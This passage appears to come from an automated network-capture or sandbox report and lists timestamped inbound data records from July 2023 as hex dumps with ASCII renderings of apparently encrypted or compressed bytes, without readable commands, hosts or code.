2023-07-26 23:33:41 UTC	16	IN	Data Raw: c3 15 ba 2d ed 0d a0 3b c7 84 fc 33 8c 66 db 08 3f b4 ab 5b 7b a9 cd eb 68 82 c1 98 27 91 c4 e2 3c eb f4 3a 10 44 21 0c 94 21 99 3b b3 67 3b d3 f2 ec e4 f0 a3 0a 97 26 c1 2d b4 49 9a 25 58 cf 57 5f c0 3e e0 32 15 1d 06 8a c9 88 f9 05 fd aa 00 fc 76 88 24 a9 62 d5 80 1d 58 02 a7 d8 43 e5 a0 77 70 f3 a7 62 15 f4 02 bf a4 16 8f bf 3d 14 2b 90 22 bf 45 00 6f 44 75 21 70 b7 8b cc 46 6e 50 c7 ad 15 2f 45 18 a8 39 b1 60 be 7f 59 c8 33 c0 c8 9c f5 02 e6 70 8b e7 a1 31 a0 0b f7 97 76 dd f4 55 30 54 98 dc 0f b4 b1 7d e4 f2 13 0c 6a 0a 3f e0 38 67 dd d7 45 2f ba bd a9 0f be d1 31 9b 3c 35 c1 8f 6d 24 bc c4 92 8e ea 3e 66 96 0d ba b5 20 92 54 d4 4a 5a 6b e7 20 c4 03 4c 63 9d c8 c8 16 68 44 2e 67 df 3a ad 3d b4 40 5f 53 47 28 36 56 7b 77 1e 19 21 07 3f 09 1d ed da 91 Data Ascii: -;3f?[{h'<:D!!;g;&-I%XW_>2v$bXCwpb=+"EoDu!pFnP/E9`Y3p1vU0T}j?8gE/1<5m$>f TJZk LchD.g:=@_SG(6V{w!?
2023-07-26 23:33:41 UTC	32	IN	Data Raw: 38 d4 f8 ac 5c 1b 04 a0 f8 7b 88 be 9f 3b 33 4a 6c 80 93 86 1b 33 2a be 39 92 15 e4 97 f3 d9 54 82 13 bf 6d 92 35 1b ac 7e 1e 92 fc 5e 62 d6 30 b2 66 0a 15 45 11 14 4d 8d 66 ec 2b 2d ae 9e 79 eb 62 a0 d0 a7 e1 a6 47 fa 82 48 2e 16 91 85 e3 4d 41 f8 42 5e 21 c5 fd e2 20 eb 42 b4 2b ea 16 3c d8 8b 70 b7 ca 78 e0 38 e5 08 47 52 fb ba c6 0f e8 2f d1 ee dc dd 9a c2 52 38 22 77 b7 65 7f ee eb 42 61 8e 03 ec 6c a1 0f 0a 7b 04 40 b0 cf f1 6d a0 f1 54 70 61 d3 e1 6f 02 85 09 b8 e7 10 42 73 e9 e1 58 53 14 75 da a2 cf 24 2b 28 51 c6 1e 6b 9e 65 5b 1a 0d 1a 39 d7 08 a9 69 56 f7 51 5b 2c c2 f9 02 92 82 09 11 3e 6c ae ec 3a 43 9e d7 96 ec 5b 3c 88 9b 9d fe 48 d7 8b 21 f2 14 7a 5b 87 5e 3d 98 77 f0 27 41 a3 30 80 ba e9 6d cb c9 0a 9b e0 10 e0 6e cf 08 80 08 e2 50 51 93 Data Ascii: 8\{;3Jl3*9Tm5~^b0fEMf+-ybGH.MAB^! B+<px8GR/R8"weBal{@mTpaoBsXSu$+(Qke[9iVQ[,>l:C[<H!z[^=w'A0mnPQ
2023-07-26 23:33:41 UTC	48	IN	Data Raw: 1c f2 08 24 d5 df 50 9c 60 8b 19 6a a7 e9 43 96 0a 01 c5 bc 60 b8 72 99 61 06 dd aa 08 85 60 00 b5 90 32 2c 77 74 1b e0 31 0b b3 5c 29 d7 47 74 c7 65 15 a6 d2 22 b2 3a cb c7 49 7d 19 86 7d 72 a9 d6 ee df fb ef 2d e8 19 30 d4 90 0c 08 ea f8 19 86 be b8 2e 48 78 f8 9f cb 45 0b 87 ba dc 2e 18 95 7b 0c 77 d3 39 b2 eb 3d 9f bc e9 87 b9 e0 24 f9 0c 19 8c 5b 57 2f 7f c2 4c 6d 1d b0 ae 37 8e da e4 00 d8 6e 53 62 85 f0 d7 12 b1 2a b6 2f 71 27 ca b1 98 31 c6 42 fd 95 1c 33 df 96 9b 98 36 ac 57 e2 fe 9b 36 47 6c d2 ba d4 c6 99 91 09 07 2b 03 1e fa ea 92 99 4b 26 ab d4 92 67 d0 61 c7 cd d8 ad da a1 51 4a e7 5a 9a 1c f8 3d b2 ff 34 81 fe 3d bb 0b 8f 55 04 f4 28 ed 00 ac 93 cd f8 bd 2d 77 2d 85 31 7a 61 31 30 28 31 00 68 26 64 80 90 98 88 9e ac 0a 09 47 54 c4 23 f1 7c Data Ascii: $P`jC`ra`2,wt1\)Gte":I}}r-0.HxE.{w9=$[W/Lm7nSb*/q'1B36W6Gl+K&gaQJZ=4=U(-w-1za10(1h&dGT#\|
2023-07-26 23:33:41 UTC	64	IN	Data Raw: 46 1f bb 21 4d 9e d1 35 07 80 7b 1f 08 2c 3b 0e 7d 8a cc 7c d3 68 62 88 36 ca ae dc 18 78 f1 7b ea 58 71 02 74 17 66 b0 46 c7 b9 1d c1 67 32 58 05 99 35 bc a5 4f a1 14 98 38 ab 97 aa 38 27 0f 0a 6d 57 b6 48 0f 1d 7a f7 49 d2 8b fe 19 90 15 2a 26 1f 7f ca 21 45 60 a7 1d 0d 3d e3 e3 b4 20 5b ce 95 15 f2 67 6d 5d f8 6e 1e 30 a9 00 74 e7 49 53 14 b6 56 57 b3 32 76 bb 44 dc d0 c8 8e 49 2a 8b 04 6f b0 ec c7 89 4a cc 98 92 ee 98 fb 68 fa c2 00 fb 8f d5 4b 38 54 f0 ab 86 a7 45 d3 7e 02 5e 7f 41 2e 8d b4 60 6e 49 c5 6d 3f bf f0 41 0b 1f a5 89 30 ae 32 6e b7 3c e7 da a5 b5 1e 29 6f 68 59 5b ae 27 4e 44 4b 13 35 e7 92 bc 4b ed 4f c2 00 2d 97 ec 87 c2 05 a8 f6 60 40 b1 e5 37 9e 19 2c de 2b 59 ba a0 d4 ec 90 1f d7 e3 ea 71 5f 5a bf c3 13 1e d1 5d 6e 7c ac c3 b5 a9 45 Data Ascii: F!M5{,;}\|hb6x{XqtfFg2X5O88'mWHzI&!E`= [gm]n0tISVW2vDIoJhK8TE~^A.`nIm?A02n<)ohY['NDK5KO-`@7,+Yq_Z]n\|E
2023-07-26 23:33:41 UTC	80	IN	Data Raw: 19 e0 f6 6d 11 db d9 1e 9f 88 59 26 ac 91 5d c0 e0 ba 1a 1e c5 fb 87 92 9b 79 f7 b8 ec a0 70 15 e3 f1 89 35 8d 50 e2 d7 27 6d 51 d2 f4 bb d7 59 49 18 cb 22 38 d2 1b 14 78 96 4a 68 4e 56 46 36 e7 59 8f 3e 35 6e 7c 9c d8 c7 0d 44 b7 f0 3a 73 97 d2 c0 33 08 57 2c 34 cf da 40 09 b4 95 d8 8d 49 7d bc 2a 5a e0 f1 fc e3 1c 62 86 fa 87 43 cd 32 7b f9 4d 1a 07 a5 70 d5 a3 4e 5d b7 b3 a1 18 e0 a0 36 b5 85 19 4d 58 ea 0e a0 53 73 ae 77 97 f9 f6 19 b6 67 e6 9a 42 0a 41 2d 17 17 3a ca 46 1b 4b 61 d8 69 d8 06 af 26 49 c7 12 d8 68 ef 3d 2b 2a c6 fc 78 da 59 49 cd 8a 59 87 94 29 ba 58 e1 58 2e 8c 8b 12 18 6e ea ac fe bd a7 43 a6 1c 9c ce 3a d9 e7 f5 b4 cd 5a fc d0 80 6f 08 3f 1c eb ae 4c 6e d2 c3 3f 9b 24 3d 58 af c5 c6 bc fc dc 30 3f 6d 30 d0 4d 05 6f fa fc 6c e7 c3 aa Data Ascii: mY&]yp5P'mQYI"8xJhNVF6Y>5n\|D:s3W,4@I}ZbC2{MpN]6MXSswgBA-:FKai&Ih=+xYIY)XX.nC:Zo?Ln?$=X0?m0Mol
2023-07-26 23:33:41 UTC	96	IN	Data Raw: 13 70 18 ea 9c b9 92 7d 0e f2 92 3a ef ca 93 b5 55 65 56 10 cf ee ed 93 28 ff 0e 52 53 65 fe 9f 5f 3b 54 9d 0c 13 42 3c 29 3c a8 5b 66 d5 ca 89 c2 06 9a 70 84 ba e6 4b e5 84 44 88 f3 bd 0e 5a bb f4 1f 1e f9 12 ec 74 47 9b 25 ce b9 7e 1b a1 fe fc 9f 2c 27 5f 0a ba bd dc 6a ee 30 a5 18 c4 b0 9d 0f 39 9d 7f cb d0 95 e4 f3 50 bf ba 41 15 36 b6 ae 9a d9 a4 a8 2a 31 36 21 2a ba 77 1d 11 fa 2f ef dd 84 e2 55 e4 04 16 bc 84 3a 7d d2 09 57 94 f0 2a 9d 9a 79 81 7a 81 35 c2 d1 4b 1e b2 96 20 a7 4c b1 50 06 19 92 0f 3a a7 01 96 3f 27 20 fe f7 f8 8a 66 13 86 19 3b 80 ef 2d e2 93 ea 28 72 ed 23 85 a0 1c ae 21 f3 eb 17 f9 0b 32 7c 31 28 9f c0 8b 35 18 3b 81 13 06 6f 27 fc ee aa ce b0 e7 30 57 03 43 29 64 57 7b 68 33 e4 f0 5c c9 01 e9 03 48 1b 38 ed f7 b2 d6 2c 5a 54 f0 Data Ascii: p}:UeV(RSe_;TB<)<[fpKDZtG%~,'_j09PA616!w/U:}W*yz5K LP:?' f;-(r#!2\|1(5;o'0WC)dW{h3\H8,ZT
2023-07-26 23:33:41 UTC	112	IN	Data Raw: 26 43 51 04 8b 70 52 f6 fb 3b 76 60 38 41 b2 a8 67 95 5a bd 4a ab 42 72 91 10 28 65 39 6d e6 e4 1d b3 86 b8 27 48 ac 03 04 e9 38 7d 68 f0 df b2 a7 03 e8 c2 5f 1e 3e 99 79 19 b8 69 23 31 4a fb 93 4c 63 06 ee fc 20 04 5a b4 18 96 05 43 39 4e 5d 6c 76 dd 6e e2 53 d9 06 f1 b4 e8 9d b1 27 d3 73 2b b9 2d f5 7c a8 b8 5d 7d 67 a3 3e f9 23 57 dc ec fd 30 eb 54 d7 c9 7d b0 e4 87 18 7e 4e fc 19 84 91 4f 6b 3a 50 11 08 a4 0c 27 a7 af 3f 95 fc fb 23 1c f8 96 c3 8b 6a 54 da fb 95 fb 40 52 45 79 ae 69 42 f3 e7 85 aa ee 54 89 e5 c8 7a 94 e2 a4 1b 1f e0 cf 79 62 d8 92 f1 77 c9 6a f8 91 53 e2 96 e2 04 d6 c3 a5 c1 6d 63 42 92 b2 59 b3 3c 6f 53 5d ca 35 3f 4f 17 39 be c4 df 2d 7e 85 52 7a 05 66 ea 19 7c 85 a2 5f 92 57 59 62 64 d0 b5 21 40 67 db 2a 95 f4 2f 25 20 dc 2b af 3c Data Ascii: &CQpR;v`8AgZJBr(e9m'H8}h_>yi#1JLc ZC9N]lvnS's+-\|]}g>#W0T}~NOk:P'?#jT@REyiBTzybwjSmcBY<oS]5?O9-~Rzf\|_WYbd!@g*/% +<
2023-07-26 23:33:41 UTC	128	IN	Data Raw: 66 96 fd 36 ca 02 a5 b4 47 2d 20 e9 d6 39 1e c3 c6 a1 7d b2 79 07 2a 9f 2b 6b b3 de a3 71 fd 1f 13 fd 89 eb 5c fb fa 95 a1 b7 69 d8 87 a5 7c 86 d6 d8 4a 53 1a 96 f1 26 a6 4c 29 db 29 3c a2 c3 8c b4 a4 8e 53 3e a4 99 0e 46 6a 9a 4b 13 6b 31 f4 16 b6 45 84 c3 8f f7 78 43 d1 4a e9 b8 63 63 0d ad 93 64 9d d5 3d 6d a0 0a e5 93 da 36 59 a8 a8 2d 03 df 11 89 2c 84 ea 73 6f fe 6d be ef cc c2 27 de 8f 1c 6f 14 01 f3 ad 79 e5 25 59 aa f1 8e 81 a3 4c 7b b8 35 7b b8 77 c3 bb 78 33 6f ca 78 de 8a 37 89 26 c9 43 5a 47 e4 af 1e 75 79 6a bb 0b 28 7d c3 2a 6f 31 0c 8c ac 93 0c 7c 66 b3 35 53 86 93 6a fb 9f 1f db 39 72 33 c1 2a ff 2e cc f9 71 9c 7e c6 25 6b 54 74 cc b3 ae 24 9d a9 99 34 62 50 f2 78 83 40 5a ce 81 70 1c 57 65 50 58 93 40 db 59 3e 07 e8 8d 91 6d f8 28 22 34 Data Ascii: f6G- 9}y+kq\i\|JS&L))<S>FjKk1ExCJccd=m6Y-,som'oy%YL{5{wx3ox7&CZGuyj(}o1\|f5Sj9r3*.q~%kTt$4bPx@ZpWePX@Y>m("4
2023-07-26 23:33:41 UTC	144	IN	Data Raw: ac c0 9c 85 69 18 43 f3 e8 ee 10 b8 f8 f1 59 21 80 5b 9b 1a 42 19 67 e7 9a 4a 49 33 9f 56 f9 57 75 c3 dc 82 e0 5d 3f 07 b0 3a 9a 73 22 cb c8 d5 da 69 2f 40 8f 7d 2f a9 3f 5c a3 f8 08 f7 b8 5d c6 b5 05 aa 4a be 3e fc 41 50 0e 6b a4 e2 a9 4a dd 09 79 fc 72 df 43 45 31 47 ed cd fb 73 7f 8e 58 43 92 f8 64 37 25 c4 90 35 f6 bd d7 23 e7 18 c6 67 a2 61 ee a2 e4 72 ed 5d 19 19 5d 09 c6 3a 46 20 77 e5 d3 fc dd 2d d7 8f 80 96 6f 29 79 e8 1f 9f 10 54 67 77 71 34 f1 64 0b 44 c4 38 f1 20 cb fe 8e 67 6f df 18 4a aa bb 12 eb 28 c0 15 64 4c 8a 82 2e 72 e4 2d f6 b7 11 41 9f 85 d1 63 8f 8c c1 e2 ce 56 53 c1 22 81 d7 66 44 dc 37 bc 8e 31 f7 75 b9 df d7 59 32 14 5f e6 d6 ef ae c5 2d 2f 7f 67 02 6e dc e6 4d f4 ce bb 88 37 d6 cd 67 9c 20 6c 04 12 f1 60 a9 3c 41 b8 28 c4 56 d5 Data Ascii: iCY![BgJI3VWu]?:s"i/@}/?\]J>APkJyrCE1GsXCd7%5#gar]]:F w-o)yTgwq4dD8 goJ(dL.r-AcVS"fD71uY2_-/gnM7g l`<A(V
2023-07-26 23:33:41 UTC	160	IN	Data Raw: c9 ea 5f f0 1e 0a e6 0f aa fd 27 02 4d b5 52 1e 85 8b bc e8 59 22 b8 10 2d 6a f2 22 75 f4 d9 3a 83 a9 92 2c 94 d2 ce bd d7 bf 5f 19 f4 0c 58 b3 bd bb 32 d9 09 ec 5e a3 12 72 75 06 93 3c bf 11 fe 80 83 f9 41 8f 58 85 0c e4 f1 8c 57 d7 61 b7 a7 d7 4c e4 27 b5 ce 29 46 62 29 a1 80 2e ce 6e 35 58 11 43 c4 98 14 c4 72 d9 17 01 75 f2 2d 8b de 24 b1 bc d7 70 a1 68 f1 d8 85 b0 88 d9 d2 2f 7b 6e 86 7f 1c c3 fe 53 99 84 e2 2b 94 25 26 f6 4c ae 7f 0a 43 d7 33 91 7a 57 06 eb 3a dd 25 16 cc 96 35 68 55 53 a5 f8 21 8d 19 84 4b 88 df 78 cd 27 4a d8 71 77 84 90 08 08 1b c1 04 e5 28 dd fc ad 4a 13 e5 88 0f 72 b9 a3 ea 2f 3d 3f d3 6e a5 f4 d3 cf 80 49 bf 29 3d d7 40 49 bf 9b 0e ed ee c7 52 74 80 7a e4 63 48 ca bb aa b8 3c ff 7a aa c0 fb e6 06 20 e1 60 e4 31 1d 45 de eb ed Data Ascii: _'MRY"-j"u:,_X2^ru<AXWaL')Fb).n5XCru-$ph/{nS+%&LC3zW:%5hUS!Kx'Jqw(Jr/=?nI)=@IRtzcH<z `1E
2023-07-26 23:33:42 UTC	176	IN	Data Raw: 8c 85 fb 78 46 f2 b1 ee 38 20 c1 b6 f4 fa 6f 35 b1 b6 c7 50 44 4f ea ab 3a 5b bc 41 4f f6 2e 9c 30 d8 3e 6a 22 38 8d a2 08 6c 15 27 0f b9 70 75 95 a0 e8 22 37 7a 34 a3 d2 56 de 58 fa a3 30 86 ed 6f 9d a8 90 b6 5f 22 04 4d 5f a4 27 6d ee ae 3e 20 3a 0c cf 60 57 db c0 a0 92 c8 ee ae 15 c4 2c c9 f6 c9 ec e5 a3 a3 fe 22 95 3c fb bd 19 af 61 f3 fa c6 99 fd 66 9d 79 04 55 8b 2d 6e d7 4a e0 87 d0 76 ff e3 04 77 5b 96 79 dd 28 06 83 65 81 d4 4a 34 63 2d f9 17 66 fb 2c 2d 6c ac b7 f6 b3 73 77 b1 f3 2a 95 b8 79 2d aa 86 6a 9d 31 39 fb ae eb 03 6b 84 47 b2 97 b9 62 12 0c 54 24 3d 44 3b 30 19 a1 b0 a7 91 08 92 b5 a5 e0 76 79 64 28 98 50 5c 9b 03 dc 69 70 47 29 cd 81 8e 06 b2 ee 5b c5 c6 94 e0 40 60 ae 36 c5 94 6e fc d8 e6 25 a8 4d e2 a8 ed 7c 87 15 cf 5f 89 f9 26 78 Data Ascii: xF8 o5PDO:[AO.0>j"8l'pu"7z4VX0o_"M_'m> :`W,"<afyU-nJvw[y(eJ4c-f,-lsw*y-j19kGbT$=D;0vyd(P\ipG)[@`6n%M\|_&x
2023-07-26 23:33:42 UTC	192	IN	Data Raw: ea fa a7 b8 8f 0c 6e 25 86 52 b9 1f 01 e1 c6 9c ce bb 4c a5 4d 26 cd dd 33 bc 68 58 9d c1 68 6f 01 fc 27 1a 69 20 01 aa 1e 47 29 9e 62 68 6e 1a c6 68 94 cc e1 11 00 dd a0 4d be 8f ad 93 9a 5f a1 cf 73 5a 3b 89 9e 4d 2a 8a 1d 1d e7 1c 69 69 e7 d1 9d a6 4a 91 bf 04 44 38 72 90 cc b1 c5 13 6e 29 b4 f8 cc 84 24 0d 84 6f e8 0a 00 8d b3 37 e6 58 91 b7 90 a8 9a 15 c5 0f 5a 55 99 7f 9a ca a5 f0 55 ee 8c 52 75 55 59 c5 91 1c fe 39 d5 5e 6d 31 c5 2c 4e 86 27 35 60 93 de 00 20 d2 d1 a9 f4 70 bb 19 86 ce 79 b2 4d 0b db 40 7e d5 10 ad cd 83 ae 93 48 f2 42 9c d8 b7 eb 70 79 92 4a 4b f4 98 97 54 8c 58 f9 68 8c 58 a6 4e 41 48 cc b7 f8 88 08 d8 d9 31 3c e5 7e c4 75 4e 57 33 d8 76 11 cf 48 e5 d7 e4 e6 42 86 b5 91 1d 6a 1f 2f 47 80 34 33 71 d9 2e 81 c2 4f b5 47 80 19 2f 44 Data Ascii: n%RLM&3hXho'i G)bhnhM_sZ;M*iiJD8rn)$o7XZUURuUY9^m1,N'5` pyM@~HBpyJKTXhXNAH1<~uNW3vHBj/G43q.OG/D
2023-07-26 23:33:42 UTC	208	IN	Data Raw: 42 6c ae ac 38 a0 b7 0a 72 ad 01 07 3f 73 49 48 cd 3b 61 80 a8 fe 20 92 51 3a aa 43 98 c4 f0 8c 9f 94 97 c8 74 3e 89 a6 4d d2 ab 0a 40 2f bb e7 0a a7 12 f6 60 3b aa 50 ff d4 3d f0 40 8f 2c 48 a9 ab 23 9a b6 4a 38 f6 f5 95 8b a8 19 84 f4 6a c2 b9 46 f2 31 02 93 64 a9 4a 36 79 06 62 e2 41 b4 b4 d3 c1 22 b1 c8 86 15 80 6c 4c 95 d4 b4 f7 0d a9 f8 67 1e cc 81 a9 8a 74 8a d7 a8 61 f5 f9 7f 92 22 66 66 6e f3 55 5e 7f 35 37 00 1e 61 a0 92 72 40 d5 d4 21 fe 51 ad e1 41 32 4e b1 2d 80 dd d1 c7 ad f4 03 46 f9 c6 3b 62 1b 12 ec 3a 4b fd 27 60 60 aa 8b d7 02 f6 06 23 6c 99 73 15 97 4c 6f 86 8e 5a 17 a7 74 3d 91 cc ab 42 1d fa 29 52 92 d5 70 0f 54 13 f1 9e be 38 38 b8 46 96 4d a0 e4 d1 5d 5c b2 23 50 3c 8f 8e ee b1 1b 4a 01 8a c3 96 30 ec 95 33 f0 0b ee 24 a0 b1 33 44 Data Ascii: Bl8r?sIH;a Q:Ct>M@/`;P=@,H#J8jF1dJ6ybA"lLgta"ffnU^57ar@!QA2N-F;b:K'``#lsLoZt=B)RpT88FM]\#P<J03$3D
2023-07-26 23:33:42 UTC	224	IN	Data Raw: 88 65 44 30 b9 f5 2a 97 c2 13 64 99 e4 8e 22 c0 a1 02 70 0d 55 b5 c7 d5 4a a3 90 49 d2 42 b3 fd c1 ca ff cd cd e5 0c 69 5e 42 f8 39 d1 51 bc c3 91 72 be 25 c3 29 80 ba 8b 67 06 03 d4 52 8b 5f 09 69 1f 32 fd 3c d4 bf 70 75 d0 16 9a 6b 2f 05 c8 76 0a 5b 1e 50 e4 03 95 61 a7 52 84 f0 f0 29 7f d6 8b f8 8b 92 3a 86 0d c7 ff 56 95 59 20 8d a3 fa 04 ca 0b 0a 23 49 77 f3 77 81 11 5d bb 1d 1d b0 6a 52 bc e9 a1 4f 04 59 aa b9 1f 2f cb eb 87 02 ba 9b 68 a7 59 ae 38 59 4b d1 65 b2 c5 ff f6 69 7e 0c 19 72 f8 f3 01 83 aa 36 01 9c c4 ce f1 d7 f8 fe d7 42 d7 53 63 99 79 71 74 70 69 91 60 9a 95 31 5f 41 3a 7c 37 07 e4 06 3a 76 96 13 b0 81 b1 84 2f ab 4a 9d e7 75 51 5f 0b 1b 18 2c 93 16 98 56 14 a0 60 96 d5 f6 83 a4 64 f6 8b ae 42 d0 71 69 62 ac 54 93 f7 04 81 d5 00 46 62 Data Ascii: eD0*d"pUJIBi^B9Qr%)gR_i2<puk/v[PaR):VY #Iww]jROY/hY8YKei~r6BScyqtpi`1_A:\|7:v/JuQ_,V`dBqibTFb
2023-07-26 23:33:42 UTC	240	IN	Data Raw: b1 3a 96 ed d5 8a 09 1a 9f 31 02 ff e0 1b d3 e7 2f dd 71 a0 85 79 90 90 6b a5 fd 31 a6 55 1b 40 89 84 6d 31 4e 14 f6 f7 3b 87 0f f6 fc 03 70 25 46 db dd e5 2a 8b 0b 4f e5 df fb f6 34 d2 aa c7 c1 0e e6 83 6f 43 a0 91 c6 99 01 ce f9 8b be a2 4b 88 da 21 a4 fa 6d 4c 0b 4a fa 36 a3 52 f4 74 6d 5f fe 1a a5 aa 91 ae ef cf 7c 9d f8 9e 00 8b f6 c2 96 92 e4 81 6d 5c 56 b3 65 ad 68 e7 47 d2 67 0c d1 60 f7 50 75 06 fb 71 cb 41 ca 7f d5 f7 63 fd 9a 0b a0 58 3d fa 5e c4 53 aa 56 2a 7b 9c 45 84 e1 ec 98 7d 00 98 a3 ba 9a 05 5a aa 79 b1 2b 0f 94 44 86 1a 75 63 d1 4a e2 9d 84 67 6a 4b 28 a5 50 fe 03 ad 3d b2 7d 7e db e7 8b 60 ca 4c 40 57 59 d1 f4 15 01 66 03 97 d0 1b e2 3e 3a a1 47 34 7b 51 ad ba 2c fe 4b 7b e1 7c 09 2f 7f 65 0a 7d f0 f2 9c 7d c7 d8 95 ca 0d 43 25 2f 3a Data Ascii: :1/qyk1U@m1N;p%FO4oCK!mLJ6Rtm_\|m\VehGg`PuqAcX=^SV{E}Zy+DucJgjK(P=}~`L@WYf>:G4{Q,K{\|/e}}C%/:
2023-07-26 23:33:42 UTC	256	IN	Data Raw: eb 9b e9 2b 14 d0 7c 73 9c 45 e9 01 02 7d e6 36 a3 2f ac 1e 04 26 42 89 b5 d3 36 6f 0a 1e 9a c7 09 99 3d 77 b6 13 fa 32 ff 94 dc 55 a8 7f cc 01 22 cc 4e 99 28 b5 1d 79 27 8e d4 0d 41 5c 4e 36 d6 a8 de 57 e3 5c 84 b6 d7 d5 d1 6f b5 e9 be 9b dc 9b dc 52 9a d4 7d 3f 5d 6b 13 fc 4d e6 76 e5 99 e4 95 17 a3 af ba d3 e2 cd 9b 31 85 30 9a 93 4b 6d aa 71 96 08 03 86 e3 7b ad e1 75 c8 ce 1c f9 30 a8 89 cf 93 4d 24 4d 8e c6 69 22 e4 57 da 5a 0e 4f c4 c9 62 31 79 63 a4 ea 03 42 2c ec 58 b1 93 d2 92 67 f9 08 46 de bd 08 53 fa e2 21 1e 17 d5 6a b8 06 8d 58 3f c8 b2 b2 9d 7b 03 47 69 cc cc 4a 58 82 fa bd 06 74 aa 75 fb 43 8c 27 7c 59 c9 15 cf 4d de fd 93 98 cf 5a 3b 80 7c 21 58 4b 26 1e 35 6c 17 4f 2d 3a d8 cb 04 3f a5 aa 24 77 1a 82 ac a5 8f ec 22 f3 65 1b f0 1d 4f d3 Data Ascii: +\|sE}6/&B6o=w2U"N(y'A\N6W\oR}?]kMv10Kmq{u0M$Mi"WZOb1ycB,XgFS!jX?{GiJXtuC'\|YMZ;\|!XK&5lO-:?$w"eO
2023-07-26 23:33:42 UTC	272	IN	Data Raw: 86 39 90 f9 55 0a 64 68 53 39 8b c3 c8 dc 2b b1 ef af 19 14 25 7d c8 29 b9 70 10 ec dc d9 77 fb 91 7d a0 2c dd 28 0f 2c ef bf e8 af 1d 1c 95 36 59 7d 50 f3 2f 79 c4 9e a2 7d 59 01 33 e7 43 9e f4 98 61 da 9b 83 10 cc 29 e3 9f fb 40 a1 cc 9f d7 f3 fe 1f 4c 9e ee be ff b5 78 5f 37 c8 7d 14 2d 9e 8c 19 45 cf ec d0 c5 a8 05 60 0c be 05 40 39 f8 14 1e e2 d8 d5 b9 d0 ea ce b1 f4 db 9b 57 44 07 73 36 33 85 c9 40 fd d8 1e 22 16 8c 73 a7 27 4f a0 31 0b 39 80 ab 62 b1 9c 0e f0 71 82 b0 41 3d b1 a1 c4 ff 8e 70 91 b3 c9 c6 6c ee 42 41 4f c5 ed 94 d2 c2 17 ef f1 be d7 01 58 08 d4 64 8a 70 64 25 90 5b c2 9a bb 9c 3a 6d 44 fd 97 b9 32 38 28 6f 0c fb 4a 51 d1 e7 15 c2 36 4c bb b8 8b 64 96 06 b1 00 1f 33 4e e5 a6 4c de f8 d4 ce 5a 2e 0b cb 9f 36 5a 2e bf 0b d9 da ae 54 b6 Data Ascii: 9UdhS9+%})pw},(,6Y}P/y}Y3Ca)@Lx_7}-E`@9WDs63@"s'O19bqA=plBAOXdpd%[:mD28(oJQ6Ld3NLZ.6Z.T
2023-07-26 23:33:42 UTC	288	IN	Data Raw: 3c c3 6a da 4f 6b 3f 41 50 c2 37 b3 0e 4b 4a 72 55 d4 f8 9e 87 91 cc 10 64 72 7a de e7 15 9d 2e 60 d0 49 62 f2 df 85 a4 93 24 80 12 71 76 b2 52 62 2d 47 ac 7f 09 28 64 9a 6f 75 28 2a c3 35 f7 8e c2 3b a6 20 d6 2c 07 99 b3 81 69 25 1a 5c 67 7b 8b b1 84 77 ed aa 35 23 45 33 94 18 b2 00 82 40 f3 0d 7a 8f 25 2b 65 4e 88 58 3c 57 77 f1 6b e8 02 13 9b 94 1c 11 88 0c 39 3d 6d 70 9f e2 54 56 b4 e1 5e 88 85 f8 21 71 02 4c a7 55 35 47 8c 95 4e 3e 48 06 57 d2 61 8a c0 9b e5 17 ce 0e 29 1b 5d b3 19 85 d1 68 54 de 3b 54 f2 35 de 0f 2b a2 2b b5 1f d1 a3 b7 fe 10 f3 3e fe b9 00 0a 64 34 d6 db 7c 9b 51 39 e1 f8 82 6f 7a f3 95 c6 33 e4 53 ac a6 f6 4a 54 4c 2a 11 df 73 76 2a 88 e1 61 ef 57 ba ba 33 1a c7 d6 4c 91 6f cc d8 fc f1 4e f7 f0 b3 41 12 9d 9b 6a 0e a1 cd f3 81 74 Data Ascii: <jOk?AP7KJrUdrz.`Ib$qvRb-G(dou(5; ,i%\g{w5#E3@z%+eNX<Wwk9=mpTV^!qLU5GN>HWa)]hT;T5++>d4\|Q9oz3SJTLsv*aW3LoNAjt
2023-07-26 23:33:42 UTC	304	IN	Data Raw: dc 86 66 ee 89 dd 26 e2 69 4f 5f 34 a5 8d e1 72 3f a7 42 4c e6 f5 07 fb 9e 0e d0 7c 2a 76 4f ed cd 02 70 00 32 28 fc ef d9 43 10 da 29 aa b3 39 82 24 d2 9c eb d9 56 c7 e0 cc c4 38 0a a7 f3 6d 05 34 a5 0a 13 f9 f5 14 e1 02 02 d7 e9 9c 67 cc 95 4a 5f 42 ee 00 8a 8f 80 a5 50 e3 86 5c 79 ed 9a 05 40 ab 4c 43 f7 44 ad 08 77 92 ef a5 2d 86 0d 89 9d 7c 88 18 bf bd 77 51 2b ca 1f 36 f2 4a 81 18 b6 03 c9 8c 14 b9 8a a2 6f 69 26 a1 56 86 09 a9 c0 5f 00 46 fd 83 24 00 ac 39 85 61 42 42 c4 46 4c d1 e1 cf 15 3b 78 cd 0f 59 fa 23 b8 89 6a 8c e7 66 1c 9f 37 17 ae 4c e3 fe 97 1e a3 58 b3 36 3d d4 63 12 1e c2 17 35 5c 03 52 83 c9 d8 e8 1d 1b 81 4a a3 a6 b5 c9 61 6d 1e 3a 73 81 a5 76 91 7b d2 f6 96 1e 16 9b 50 52 14 75 2b 66 48 41 dc 6b 57 4f cd 49 a0 c6 59 ec 4e a3 13 e0 Data Ascii: f&iO_4r?BL\|*vOp2(C)9$V8m4gJ_BP\y@LCDw-\|wQ+6Joi&V_F$9aBBFL;xY#jf7LX6=c5\RJam:sv{PRu+fHAkWOIYN
2023-07-26 23:33:42 UTC	320	IN	Data Raw: be de e6 40 2a ce 66 e0 fd 7b 4b d4 b6 bd c2 14 53 f0 c2 68 03 19 76 58 e5 fc 67 6c 5a 99 55 f4 7d cb 4b bc f9 62 7c 5b da 68 e6 c0 f2 2d 3e c9 8d 5c a3 aa 3b 8b 7d 3e 02 da be a0 a3 35 0d d8 bb db c0 81 76 47 f4 e4 78 8b ec 35 8e 0a 0d dd a7 b9 b3 cb 95 83 4e a4 d2 46 40 9c 0b 0b dd b2 46 bf a6 06 6d 02 94 23 fb 8f 6d 75 57 3b d1 05 17 88 a3 19 58 8e 86 71 b2 77 41 f1 68 8d 7b 61 ff 31 ce de f2 09 ed 54 04 1d cf 65 c2 5e 37 df d6 53 48 2b 7b 58 c9 52 8b 96 cb b6 0b af 6f 7b f1 c5 d2 6e c1 8e 11 41 66 07 f3 74 05 bf de 9a 53 77 01 f3 68 16 1d 47 c4 50 51 99 4d 65 ba da 1d 4b f1 c3 64 f0 03 4b 68 38 7c d9 1b 96 49 98 dc e8 15 31 7c f4 6c 70 5d 02 80 2a 56 38 c4 73 90 a3 e1 6f 8b b5 ff 8b 2a 04 f2 f9 d6 31 06 40 